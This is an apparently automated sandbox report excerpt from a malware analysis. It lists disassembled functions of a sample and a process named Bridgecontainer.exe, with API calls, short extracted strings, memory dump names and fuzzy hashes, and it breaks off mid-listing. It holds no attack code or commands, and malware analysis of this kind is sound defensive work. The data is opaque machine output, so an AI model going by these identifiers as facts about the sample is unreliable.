Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free
String ID: X\
API String ID: 269201875-3186185854
Opcode ID: dbdfa76b9e78c162bd6969281e01ad9aa05380dfb0a6764678e0586b91950510
Instruction ID: 9d75efd0b43f5c369d2e1506a759b2eaa16a6e999d3d7fc86ca17c0da9f3360d
Opcode Fuzzy Hash: dbdfa76b9e78c162bd6969281e01ad9aa05380dfb0a6764678e0586b91950510
Instruction Fuzzy Hash: 0411E975A00A119AEB209B7DAC45BB63FD5B761330F140616F621CB2D0EB75EC45D784

Function 005AEC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005AF25E
___raise_securityfailure.LIBCMT ref: 005AF345

Strings

8_, xrefs: 005AF340

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8_
API String ID: 3761405300-2604883730
Opcode ID: 8ddc717dcf62255502056bdc4e43123559e825e5671c36cfbec3937992f20d19
Instruction ID: 17d9f1eb5dec70a87c8b423e8825f3f33852b94a8dd1d3260d029da493829c3d
Opcode Fuzzy Hash: 8ddc717dcf62255502056bdc4e43123559e825e5671c36cfbec3937992f20d19
Instruction Fuzzy Hash: 722119B95503048BD750DF54FD85B243BA8BB69310F58682AE608CB3E2D3B95988EB45

Function 005A0889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,005A09D0,?,00000000,00000000), ref: 005A08AD
SetThreadPriority.KERNEL32(?,00000000), ref: 005A08F4

Part of subcall function 00596E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00596EAF

Strings

CreateThread failed, xrefs: 005A08B9

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: a2f48fbd34614611af5033a1fd627eeb71430599a17466ace5ae89e8a2942fe4
Instruction ID: e41112f85347ae7658840786d2309775ded4907017f300aea6eeea804a059369
Opcode Fuzzy Hash: a2f48fbd34614611af5033a1fd627eeb71430599a17466ace5ae89e8a2942fe4
Instruction Fuzzy Hash: B401D6B62443076FD730AF54EC8AF6B7B98FB51711F20002FF586621C1CAA1A8459664

Function 005BB2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B8FA5: GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
Part of subcall function 005B8FA5: _free.LIBCMT ref: 005B8FDC
Part of subcall function 005B8FA5: SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
Part of subcall function 005B8FA5: _abort.LIBCMT ref: 005B9023

_abort.LIBCMT ref: 005BB2E0
_free.LIBCMT ref: 005BB314

Strings

\, xrefs: 005BB30B

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: \
API String ID: 289325740-1951137136
Opcode ID: eb6f4bcc66659508f7fa27d54582bde8e0e86807f965c5292406ba8930b68c28
Instruction ID: 7b1c7364142a40113da07c3e201ef09a994a1f01c9bbb4d7cb21b38f1ff64940
Opcode Fuzzy Hash: eb6f4bcc66659508f7fa27d54582bde8e0e86807f965c5292406ba8930b68c28
Instruction Fuzzy Hash: D2018031D01A229FDB21AF5988076ADBFA4BF54B21B19090EE4216B681CBF07D41CFC2

Function 0059130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0059DA98: _swprintf.LIBCMT ref: 0059DABE
Part of subcall function 0059DA98: _strlen.LIBCMT ref: 0059DADF
Part of subcall function 0059DA98: SetDlgItemTextW.USER32(?,005CE154,?), ref: 0059DB3F
Part of subcall function 0059DA98: GetWindowRect.USER32(?,?), ref: 0059DB79
Part of subcall function 0059DA98: GetClientRect.USER32(?,?), ref: 0059DB85

GetDlgItem.USER32(00000000,00003021), ref: 0059134F
SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

Strings

0, xrefs: 0059130E

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 8351093293329deaf4d9ea41db2c99ef11315bde1e39b24e1cd2f175de13570f
Instruction ID: 23597ab373cd4aba9e4a5df8c4543c156e050bda7513ab1a8481a1805bdcda83
Opcode Fuzzy Hash: 8351093293329deaf4d9ea41db2c99ef11315bde1e39b24e1cd2f175de13570f
Instruction Fuzzy Hash: 4AF08C7010065EAADF250F608809BB93FA8BB20345F0C8818BD49945A1C778C995EA18

Function 005A084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,005A0A78,?), ref: 005A0854
GetLastError.KERNEL32(?), ref: 005A0860

Part of subcall function 00596E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00596EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 005A0869

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: bcfaf165e05b78588bcfc915e5ca45d53edcf2366f7bc513e67eea2517bbfec6
Instruction ID: cd4edb8e4d1e88de11f201b0002ddcd8538e48fe3938c4a56382114a5f6ef1bc
Opcode Fuzzy Hash: bcfaf165e05b78588bcfc915e5ca45d53edcf2366f7bc513e67eea2517bbfec6
Instruction Fuzzy Hash: 12D05E369084222ACF102768AC0EEAF7D19BFA2770F204719F239652F5DA25095996D5

Function 0059DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0059D32F,?), ref: 0059DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0059D32F,?), ref: 0059DA61

Strings

RTL, xrefs: 0059DA5B

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: bb6e983b0cb25365a7bc76146a1d86965a8503ec14324ee1330faea8644e730e
Instruction ID: 0c5db67e59d6524343cb88489b92fb4ffffa485f8e8e749cb41063fdc6249ce2
Opcode Fuzzy Hash: bb6e983b0cb25365a7bc76146a1d86965a8503ec14324ee1330faea8644e730e
Instruction Fuzzy Hash: 71C01232289B54BAEB302B606C0DF832E586B20F12F09444CB241EA1D0DAE6CA4886A1

Analysis Process: Bridgecontainer.exePID: 5688, Parent PID: 5588COMMON

Executed Functions

Function 00007FF848F133B0 Relevance: 1.8, Strings: 1, Instructions: 513COMMON

Download Yara Rule

Strings

N_H, xrefs: 00007FF848F13870

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: N_H
API String ID: 0-343878021
Opcode ID: d833bf9d3e398c0c66230f0e3eb19c677d1a4df6a0b88a402c86c8ee89670dc7
Instruction ID: e3c47e72fec07d4bd3d37ced719365d4848149701ab8062b335d48d65775183f
Opcode Fuzzy Hash: d833bf9d3e398c0c66230f0e3eb19c677d1a4df6a0b88a402c86c8ee89670dc7
Instruction Fuzzy Hash: 6A02BD3090DA8A8FEB85EB68C8587A9BBF0FF59340F5401BAC049C72D6DB786845CB55

Function 00007FF848F1B075 Relevance: .7, Instructions: 656COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1add6c9e7245140095d56551dbc94c8720343c468a070224e8f05864b316f82e
Instruction ID: ecd13359e8d2f30a404e7b9b6a06c5746b02d544735676234ebf1f1e73a69de3
Opcode Fuzzy Hash: 1add6c9e7245140095d56551dbc94c8720343c468a070224e8f05864b316f82e
Instruction Fuzzy Hash: 48329C31D1DA8A8FEB99EB6888597B9BBB1FF15340F0800BAD009D71D2DB386944CB55

Function 00007FF848F1B070 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccf66f4051654e249c715c637621f1693088f8f50fe271909175679fce2f1a02
Instruction ID: f24bcf738bf70d4df050cb91ab594e0e194cb4ce9c282ce64f6db9139d6c53c2
Opcode Fuzzy Hash: ccf66f4051654e249c715c637621f1693088f8f50fe271909175679fce2f1a02
Instruction Fuzzy Hash: F0025A31D1965A8FEB98EB68C8557B9BBB1FF19341F0401BAD00ED32D2CB386984CB55

Function 00007FF848F1CF88 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ecfedaf83eb4bc8ea2b4781a55a619309e916fe5b0900725f0c062fd5e5da3f
Instruction ID: add3e47b0af12d7fefc111807d05c86ce1e656e8fab7e80bc7102a4806448ee9
Opcode Fuzzy Hash: 8ecfedaf83eb4bc8ea2b4781a55a619309e916fe5b0900725f0c062fd5e5da3f
Instruction Fuzzy Hash: 39B19C3090D68E8FEB99EF2898696BA7BF0FF19340F1045BAD409C71D2DB3AA544C745

Function 00007FF848F1AEED Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c85d3b1b4301a7fed8949f7db5f680ba0598bd2c9a48dfcf30be5eb6ea8ee0c
Instruction ID: 8253c42bb5b22ba4d9492ac25da0dc0491dd3df8ff03411231cad2f77c8e26f2
Opcode Fuzzy Hash: 9c85d3b1b4301a7fed8949f7db5f680ba0598bd2c9a48dfcf30be5eb6ea8ee0c
Instruction Fuzzy Hash: A6A1AB3090D68E8FEB95FB64C8596BA7BF0FF59341F0005BAD809C7192DB3AA584CB45

Function 00007FF848F1E8BA Relevance: 10.3, Strings: 8, Instructions: 325COMMON

Download Yara Rule

Strings

Y, xrefs: 00007FF848F1F655
}, xrefs: 00007FF848F1F6AB
B, xrefs: 00007FF848F1F4E6
M, xrefs: 00007FF848F1F536
g, xrefs: 00007FF848F1E8F7
e, xrefs: 00007FF848F20303
0Y_H, xrefs: 00007FF848F1F3D0
k, xrefs: 00007FF848F202B0

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: 0Y_H$B$M$Y$e$g$k$}
API String ID: 0-1278765890
Opcode ID: c86183d4c2b0df508e555f543e519caea26607ba3295ce55e4348099377c281c
Instruction ID: 6fa77d9c2e6006af4e7389b4ad6bafafec252f24c4db1525de0ca0d7738ff1da
Opcode Fuzzy Hash: c86183d4c2b0df508e555f543e519caea26607ba3295ce55e4348099377c281c
Instruction Fuzzy Hash: E0D1C370D18A698FDBA8EF18C8957AAB7B1FB58341F1041EAD40DE3291DF356E818F44

Function 00007FF848F1E78E Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

;, xrefs: 00007FF848F1F975
F, xrefs: 00007FF848F1ECF4
N, xrefs: 00007FF848F1FAD3

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: ;$F$N
API String ID: 0-723008160
Opcode ID: 9d6612cbce6c3d905e5c98b0c1d6c02ffc4daa26b85bc43577167e823f2d9ddb
Instruction ID: ea2edfc4216749897b2d16dffa27e27763c08bbcde5ff59e88b6ca679783bddc
Opcode Fuzzy Hash: 9d6612cbce6c3d905e5c98b0c1d6c02ffc4daa26b85bc43577167e823f2d9ddb
Instruction Fuzzy Hash: 8D518070D086298FEBA4EF28C8547E9B6F1BF58351F5001EAD44DA7291CB789E84DF05

Function 00007FF848F10C82 Relevance: 2.7, Strings: 2, Instructions: 237COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F10F60
H, xrefs: 00007FF848F10D59

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: H$H
API String ID: 0-136785262
Opcode ID: 611532c8da8b441bd22ac164ac765a1fffafc52c6cf7a753727fe7e6997866c4
Instruction ID: d573a427197cd658c9ca25a8d03458effb39738da59aa7556625ac56def8b7b0
Opcode Fuzzy Hash: 611532c8da8b441bd22ac164ac765a1fffafc52c6cf7a753727fe7e6997866c4
Instruction Fuzzy Hash: 8181D371D0D96A4EE798FB289805BA9B7B1FF94350F4002BAC40DD71D2DE386D858B44

Function 00007FF848F1E6D2 Relevance: 2.6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

P, xrefs: 00007FF848F1E868
}, xrefs: 00007FF848F1E709

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: P$}
API String ID: 0-1285626757
Opcode ID: dd3767b03ba641125c9284d00cb9d2b9d8f1cb9d9bcd6e57c4c39f01e809c28f
Instruction ID: ac35c4a140e7dddd8d5ef9e73efa325215cca9f8cc82850ab03e92b0b35461a7
Opcode Fuzzy Hash: dd3767b03ba641125c9284d00cb9d2b9d8f1cb9d9bcd6e57c4c39f01e809c28f
Instruction Fuzzy Hash: BC11B370D0862A8FEB68EF14C895BADB7B1FB54341F1441EAD00DA62D1DB386E84DF44

Function 00007FF848F11190 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F111ED

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: f0b226f5ee2bb6657dbe1356c93f3a99af7bf926f586411dd7fa6b63893d1c19
Instruction ID: e13571519dbc3222bf41fe86d8811e455ee7b90667cca2bd080b079d7d11b5ec
Opcode Fuzzy Hash: f0b226f5ee2bb6657dbe1356c93f3a99af7bf926f586411dd7fa6b63893d1c19
Instruction Fuzzy Hash: 6131D530D0CA9E4FEB99EB2898196B9BBE0FF59341F04147ED409D71C2EF285884C755

Function 00007FF848F111E8 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

XyH, xrefs: 00007FF848F111ED

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: XyH
API String ID: 0-3434043539
Opcode ID: c9f5dc008fc6303cdc0a78032fe509ba5c35c865c0f7f2e263d4bb69b02428fa
Instruction ID: 0961b4171db9cbf0698f321609bf6b0ee6977a12e3663912e6d819c51fae4603
Opcode Fuzzy Hash: c9f5dc008fc6303cdc0a78032fe509ba5c35c865c0f7f2e263d4bb69b02428fa
Instruction Fuzzy Hash: C3319E31D0C99A8FEB89EB28D8156FE77A1FF99350F04107AD009DB1D2DB25A844C790

Function 00007FF848F10A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

vH, xrefs: 00007FF848F10A70

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID: vH
API String ID: 0-2844672238
Opcode ID: 8cf3b0ed9a9af723b6faee3578ca0f63bac8d971e4c857f37ddb753a2d879ab0
Instruction ID: c160f28f0cbc85648f7c20fc44a6b77cf0c52d04ae4eb51a26362682bec0d397
Opcode Fuzzy Hash: 8cf3b0ed9a9af723b6faee3578ca0f63bac8d971e4c857f37ddb753a2d879ab0
Instruction Fuzzy Hash: FA116A31D0C95E9EE780FB68D8492B97BE0FFA8381F4405B6D809C6192EF38A9448700

Function 00007FF848F1CF20 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326521440f937f2a901d197756f3bd081fcb2031181d04075d1e9dcf452b8f96
Instruction ID: 3b61bef82932d945d8d2c05442725b3370b714c9477def1b3f47dd8b3704e71f
Opcode Fuzzy Hash: 326521440f937f2a901d197756f3bd081fcb2031181d04075d1e9dcf452b8f96
Instruction Fuzzy Hash: 7AE1BB30D0D69E8FEB95EB68A8192FA7BB0FF15350F0401BAD448D21D2EF3D69488B55

Function 00007FF848F1BBDA Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3f84f6b2e28a7dd1ea195f88ee67a70cefcf469422faed9aa3c0fcb01d1d10
Instruction ID: 7cfb842ca9a52839006df4319ac17db6019ccdf34703f4fe36f184536eb9260d
Opcode Fuzzy Hash: ef3f84f6b2e28a7dd1ea195f88ee67a70cefcf469422faed9aa3c0fcb01d1d10
Instruction Fuzzy Hash: FAE15830D2D64E8FEB55EB68C8586EDBBE0FF19341F0844BAD409D7192EB38A944CB05

Function 00007FF848F1C0C0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f44cfa017b4092aa77fb21f3f6e9dbf5f7e1d063033d0ef6c98df348086d958f
Instruction ID: d54bd45c66f47b62644025c64f837983c258b66429caf58f9a76d0641c1ad44e
Opcode Fuzzy Hash: f44cfa017b4092aa77fb21f3f6e9dbf5f7e1d063033d0ef6c98df348086d958f
Instruction Fuzzy Hash: D4D1573091DA4D8FEB95EB6888596FDBBB1FF19340F4401BAD409D72D2EB38A944CB44

Function 00007FF848F12CC3 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73017ef461b6115910b6f9972e0c0181fa015e1e6e27ae54c0bea7c654b93820
Instruction ID: aea61a45456f555f6eacb27fda380d4774452b48cc9ea581d76a23cea790592b
Opcode Fuzzy Hash: 73017ef461b6115910b6f9972e0c0181fa015e1e6e27ae54c0bea7c654b93820
Instruction Fuzzy Hash: 00D17A30D1D68A8FE742FBA888596B9BBE0FF19341F0505BAD409C71E2EB38A944C755

Function 00007FF848F1DA0A Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996375de058040fea7f3f39090513ba88f80cd1596a625a2dcba2141c365548c
Instruction ID: 2296b1c23a18adc0397da0c26bdf50637842984faf74d05251422f224207aaa4
Opcode Fuzzy Hash: 996375de058040fea7f3f39090513ba88f80cd1596a625a2dcba2141c365548c
Instruction Fuzzy Hash: 8ED12931D1969A9FEB98EB68C8657B9BBB1FF15340F0400BAD00DD72D2DB386984CB45

Function 00007FF848F11B15 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75734e272ce370eae5a1c2062078ba4e8dbb392e6cdac68ccd1f7785c2830aed
Instruction ID: 14c95011230a524ed55a103ef62702dd2c9b2a955d7da36eb0cdd3f169a4bac4
Opcode Fuzzy Hash: 75734e272ce370eae5a1c2062078ba4e8dbb392e6cdac68ccd1f7785c2830aed
Instruction Fuzzy Hash: 34B1EF31A0DB8A8FDB59EF2888652BA7BE1FF95340F0405BED449C71D2DB28AC85C745

Function 00007FF848F105F0 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4307967a14f73225eb5bb5b7f5e20cfb8153a075963b5ca4f32eb054b5f5a6f8
Instruction ID: 94a64e4bcb62c74adb73c28da482451b90aec65bcbb31f3869eccea3177cd6de
Opcode Fuzzy Hash: 4307967a14f73225eb5bb5b7f5e20cfb8153a075963b5ca4f32eb054b5f5a6f8
Instruction Fuzzy Hash: 02C1C130A1CA8A8FDB59EF2888596BA7BE1FF99340F1445BED409C71D2DF34A881C745

Function 00007FF848F1DA88 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2939d4bdb43d7ff41b710166f4a261868904c2ea94beaa989ed883a7cf78cc2a
